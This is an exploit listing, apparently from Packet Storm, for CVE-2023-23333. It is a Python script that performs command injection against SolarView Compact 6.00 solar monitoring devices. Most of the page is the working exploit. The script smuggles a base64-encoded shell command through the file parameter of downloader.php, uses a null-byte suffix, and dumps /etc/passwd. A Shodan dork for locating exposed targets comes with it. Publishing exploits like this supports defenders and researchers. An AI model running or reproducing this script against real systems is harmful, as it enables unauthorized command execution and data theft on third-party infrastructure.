Lucene search

K
packetstormByteHunterPACKETSTORM:177576
HistoryMar 14, 2024 - 12:00 a.m.

SolarView Compact 6.00 Command Injection

2024-03-1400:00:00
ByteHunter
packetstormsecurity.com
170
solarview compact
command injection
cve-2023-23333
shodan
base64
bash
vulnerability

AI Score

7.4

Confidence

Low

EPSS

0.961

Percentile

99.5%

`#- Exploit Title: SolarView Compact 6.00 - Command Injection  
#- Shodan Dork: http.html:"solarview compact"  
#- Exploit Author: ByteHunter  
#- Email: [email protected]  
#- Version: 6.00  
#- Tested on: 6.00  
#- CVE : CVE-2023-23333  
  
  
import argparse  
import requests  
  
def vuln_check(ip_address, port):  
url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"  
response = requests.get(url)  
if response.status_code == 200:  
output = response.text  
if "root" in output:  
print("Vulnerability detected: Command Injection possible.")  
print(f"passwd file content:\n{response.text}")  
  
  
else:  
print("No vulnerability detected.")  
else:  
print("Error: Unable to fetch response.")  
  
def main():  
parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")  
parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)  
parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)  
args = parser.parse_args()  
  
ip_address = args.ip  
port = args.port  
vuln_check(ip_address, port)  
  
if __name__ == "__main__":  
main()  
  
`

AI Score

7.4

Confidence

Low

EPSS

0.961

Percentile

99.5%